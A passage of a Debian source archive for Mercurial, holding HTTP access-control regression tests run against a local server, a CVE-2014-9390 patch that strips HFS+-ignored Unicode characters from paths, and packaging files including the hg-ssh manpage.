baduser + > deny_read = baduser + > EOF + + $ REMOTE_USER=baduser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allowpull=false denies read access to repo + + $ cat > .hg/hgrc < [web] + > allowpull = false + > EOF + + $ hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=capabilities' + 401 pull not authorized + + 0 + pull not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=listkeys' --requestheader 'x-hgarg-1=namespace=phases' + 401 pull not authorized + + 0 + pull not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=listkeys+namespace%3Dphases' + 401 pull not authorized + + 0 + pull not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 401 pull not authorized + + 0 + pull not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ hg --cwd ../test2 pull http://localhost:$HGPORT/ + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +Attempting a write command with HTTP GET fails + + $ cat > .hg/hgrc < EOF + + $ REQUEST_METHOD=GET hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ hg bookmarks + no bookmarks set + $ hg bookmark -d bm + abort: bookmark 'bm' does not exist + [255] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +Attempting a write command with an unknown HTTP verb fails + + $ REQUEST_METHOD=someverb hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ hg bookmarks + no bookmarks set + $ hg bookmark -d bm + abort: bookmark 'bm' does not exist + [255] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 405 push requires POST request + + 0 + push requires POST request + [1] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +Pushing on a plaintext channel is disabled by default + + $ cat > .hg/hgrc < EOF + + $ REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 403 ssl required + + 0 + ssl required + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 403 ssl required + + 0 + ssl required + [1] + + $ hg bookmarks + no bookmarks set + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 403 ssl required + + 0 + ssl required + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 403 ssl required + + 0 + ssl required + [1] + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + exporting bookmark bm + abort: HTTP Error 403: ssl required + [255] + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + abort: HTTP Error 403: ssl required + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_push=* denies pushing to unauthenticated users + + $ cat > .hg/hgrc < [web] + > push_ssl = false + > deny_push = * + > EOF + + $ REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ hg bookmarks + no bookmarks set + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 push not authorized + + 0 + push not authorized + [1] + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + exporting bookmark bm + abort: authorization failed + [255] + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_push=* denies pushing to authenticated users + + $ REMOTE_USER=someuser REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ hg bookmarks + no bookmarks set + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 push not authorized + + 0 + push not authorized + [1] + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ REMOTE_USER=someuser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + exporting bookmark bm + abort: authorization failed + [255] + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_push= denies pushing to user in list + + $ cat > .hg/hgrc < [web] + > push_ssl = false + > deny_push = baduser + > EOF + + $ REMOTE_USER=baduser REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ hg bookmarks + no bookmarks set + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 push not authorized + + 0 + push not authorized + [1] + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ REMOTE_USER=baduser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + exporting bookmark bm + abort: authorization failed + [255] + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_push= denies pushing to user not in list because allow_push isn't set + + $ REMOTE_USER=gooduser REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ hg bookmarks + no bookmarks set + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 push not authorized + + 0 + push not authorized + [1] + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ REMOTE_USER=gooduser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + exporting bookmark bm + abort: authorization failed + [255] + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_push=* allows pushes from unauthenticated users + + $ cat > .hg/hgrc < [web] + > push_ssl = false + > allow_push = * + > EOF + + $ REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 200 Script output follows + + 1 + + $ hg bookmarks + bm 0:cb9a9f314b8b + $ hg book -d bm + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 200 Script output follows + + write command no defined permissions + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 200 Script output follows + + write command w/ defined permissions + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + exporting bookmark bm + [1] + + $ hg book -d bm + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + remote: adding changesets + remote: adding manifests + remote: adding file changes + remote: added 1 changesets with 1 changes to 1 files + + $ hg strip -r 1: + saved backup bundle to $TESTTMP/test/.hg/strip-backup/ba677d0156c1-backup.hg + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_push=* allows pushes from authenticated users + + $ REMOTE_USER=someuser REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 200 Script output follows + + 1 + + $ hg bookmarks + bm 0:cb9a9f314b8b + $ hg book -d bm + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 200 Script output follows + + write command no defined permissions + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 200 Script output follows + + write command w/ defined permissions + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ REMOTE_USER=someuser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + exporting bookmark bm + [1] + + $ hg book -d bm + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + remote: adding changesets + remote: adding manifests + remote: adding file changes + remote: added 1 changesets with 1 changes to 1 files + + $ hg strip -r 1: + saved backup bundle to $TESTTMP/test/.hg/strip-backup/ba677d0156c1-backup.hg + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_push= denies push to user not in list + + $ cat > .hg/hgrc < [web] + > push_ssl = false + > allow_push = gooduser + > EOF + + $ REMOTE_USER=baduser REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ hg bookmarks + no bookmarks set + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 push not authorized + + 0 + push not authorized + [1] + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ REMOTE_USER=baduser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + exporting bookmark bm + abort: authorization failed + [255] + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_push= allows push from user in list + + $ REMOTE_USER=gooduser REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 200 Script output follows + + 1 + + $ hg bookmarks + bm 0:cb9a9f314b8b + $ hg book -d bm + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 200 Script output follows + + 1 + + $ hg bookmarks + bm 0:cb9a9f314b8b + $ hg book -d bm + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 200 Script output follows + + write command no defined permissions + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 200 Script output follows + + write command w/ defined permissions + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ REMOTE_USER=gooduser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + exporting bookmark bm + [1] + + $ hg book -d bm + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + remote: adding changesets + remote: adding manifests + remote: adding file changes + remote: added 1 changesets with 1 changes to 1 files + + $ hg strip -r 1: + saved backup bundle to $TESTTMP/test/.hg/strip-backup/ba677d0156c1-backup.hg + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.deny_push takes precedence over web.allow_push + + $ cat > .hg/hgrc < [web] + > push_ssl = false + > allow_push = someuser + > deny_push = someuser + > EOF + + $ REMOTE_USER=someuser REQUEST_METHOD=POST hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 push not authorized + + 0 + push not authorized + [1] + + $ hg bookmarks + no bookmarks set + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 push not authorized + + 0 + push not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 push not authorized + + 0 + push not authorized + [1] + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ REMOTE_USER=someuser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + no changes found + exporting bookmark bm + abort: authorization failed + [255] + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + searching for changes + abort: authorization failed + [255] + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + +web.allow_push has no effect if web.deny_read is set + + $ cat > .hg/hgrc < [web] + > push_ssl = false + > allow_push = * + > deny_read = * + > EOF + + $ REQUEST_METHOD=POST REMOTE_USER=someuser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=pushkey' --requestheader 'x-hgarg-1=namespace=bookmarks&key=bm&old=&new=cb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=batch' --requestheader 'x-hgarg-1=cmds=pushkey+namespace%3Dbookmarks%2Ckey%3Dbm%2Cold%3D%2Cnew%3Dcb9a9f314b8b07ba71012fcdbc544b5a4d82ff5b' + 401 read not authorized + + 0 + read not authorized + [1] + + $ hg bookmarks + no bookmarks set + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadnoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customreadwithperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritenoperm' + 401 read not authorized + + 0 + read not authorized + [1] + + $ "$TESTDIR/get-with-headers.py" $LOCALIP:$HGPORT '?cmd=customwritewithperm' + 401 read not authorized + + 0 + read not authorized + [1] + +Reset server to remove REQUEST_METHOD hack to test hg client + + $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS + $ REMOTE_USER=someuser hg serve -p $HGPORT -d --pid-file hg.pid + $ cat hg.pid > $DAEMON_PIDS + + $ hg --cwd ../test2 push -B bm http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + abort: authorization failed + [255] + + $ hg --cwd ../test2 push http://localhost:$HGPORT/ + pushing to http://localhost:$HGPORT/ + abort: authorization failed + [255] --- a/tests/test-pull-http.t +++ b/tests/test-pull-http.t @@ -37,7 +37,6 @@ expect error, cloning not allowed $ hg serve -p $HGPORT -d --pid-file=hg.pid -E errors.log $ cat hg.pid >> $DAEMON_PIDS $ hg clone http://localhost:$HGPORT/ test4 - requesting all changes abort: authorization failed [255] $ "$TESTDIR/killdaemons.py" $DAEMON_PIDS @@ -57,7 +56,6 @@ serve errors expect error, pulling not allowed $ req - pulling from http://localhost:$HGPORT/ abort: authorization failed % serve errors --- a/tests/test-push-http.t +++ b/tests/test-push-http.t @@ -139,27 +139,3 @@ expect phase change success [1] $ hg rollback repository tip rolled back to revision 0 (undo serve) - -expect authorization error: all users denied - - $ echo '[web]' > .hg/hgrc - $ echo 'push_ssl = false' >> .hg/hgrc - $ echo 'deny_push = *' >> .hg/hgrc - $ req - pushing to http://localhost:$HGPORT/ - searching for changes - abort: authorization failed - % serve errors - [255] - -expect authorization error: some users denied, users must be authenticated - - $ echo 'deny_push = unperson' >> .hg/hgrc - $ req - pushing to http://localhost:$HGPORT/ - searching for changes - abort: authorization failed - % serve errors - [255] - - $ cd .. debian/patches/CVE-2014-9390.pt10000664000000000000000000000331112445112145012645 0ustar # HG changeset patch # User Augie Fackler # Date 1418753201 18000 # Node ID 885bd7c5c7e3efc10081c09c11e538a3fa19ace4 # Parent 035434b407be60e5ae7a0da56f9d7a187a6bef5a encoding: add hfsignoreclean to clean out HFS-ignored characters According to Apple Technote 1150 (unavailable from Apple as far as I can tell, but archived in several places online), HFS+ ignores sixteen specific unicode runes when doing path normalization. We need to handle those cases, so this function lets us efficiently strip the offending characters from a UTF-8 encoded string (which is the only way it seems to matter on OS X.) diff -r 035434b407be -r 885bd7c5c7e3 mercurial/encoding.py --- a/mercurial/encoding.py Thu Dec 11 15:42:49 2014 -0500 +++ b/mercurial/encoding.py Tue Dec 16 13:06:41 2014 -0500 @@ -8,6 +8,28 @@ import error import unicodedata, locale, os +# These unicode characters are ignored by HFS+ (Apple Technote 1150, +# "Unicode Subtleties"), so we need to ignore them in some places for +# sanity. +_ignore = [unichr(int(x, 16)).encode("utf-8") for x in + "200c 200d 200e 200f 202a 202b 202c 202d 202e " + "206a 206b 206c 206d 206e 206f feff".split()] +# verify the next function will work +assert set([i[0] for i in _ignore]) == set(["\xe2", "\xef"]) + +def hfsignoreclean(s): + """Remove codepoints ignored by HFS+ from s. + + >>> hfsignoreclean(u'.h\u200cg'.encode('utf-8')) + '.hg' + >>> hfsignoreclean(u'.h\ufeffg'.encode('utf-8')) + '.hg' + """ + if "\xe2" in s or "\xef" in s: + for c in _ignore: + s = s.replace(c, '') + return s + def _getpreferredencoding(): ''' On darwin, getpreferredencoding ignores the locale environment and debian/copyright0000664000000000000000000000266512201757705011142 0ustar Format: http://anonscm.debian.org/viewvc/dep/web/deps/dep5.mdwn?revision=174 Upstream-Name: mercurial Upstream-Source: http://www.selenic.com/mercurial/ Files: * Copyright: Copyright 2005 Matt Mackall and others. License: GPL-2+ You can redistribute this software and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; version 2 or any later version. . This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. . On Debian systems, the complete text of the GNU General Public License can be found in /usr/share/common-licenses/GPL-2 file. Files: debian/* Copyright: Copyright 2005-2010, Vincent Danjean License: GPL-2+ You can redistribute this software and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; version 2 or any later version. . This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. . On Debian systems, the complete text of the GNU General Public License can be found in /usr/share/common-licenses/GPL-2 file. debian/mercurial.install0000664000000000000000000000017312231000135012527 0ustar debian/tmp/usr/bin debian/tmp/usr/lib debian/hgext.rc usr/share/mercurial/ debian/hgext.rc.md5sums usr/share/mercurial/ debian/mercurial-common.manpages0000664000000000000000000000006312201757705014163 0ustar doc/hg.1 doc/hgrc.5 doc/hgignore.5 debian/hg-ssh.8 debian/hg-ssh.80000664000000000000000000000154612201757705010466 0ustar .TH HG-SSH 8 2008-01-03 .SH NAME hg-ssh \- restricted ssh login shell for Mercurial .SH SYNOPSIS .B hg-ssh .IR repositories ... .SH DESCRIPTION .B hg-ssh can be used as a restricted shell where access to Mercurial repositories is given over .BR ssh (1). It should be specified, together with the paths to the .I repositories the user should be given access to, as a .I command option in an .BR authorized_keys (5) file. .PP An example .I authorized_keys line using .BR hg-ssh : .RS command="hg-ssh path/to/repo1 /path/to/repo2 ~/repo3 ~user/repo4" ssh-rsa AA...== .RE 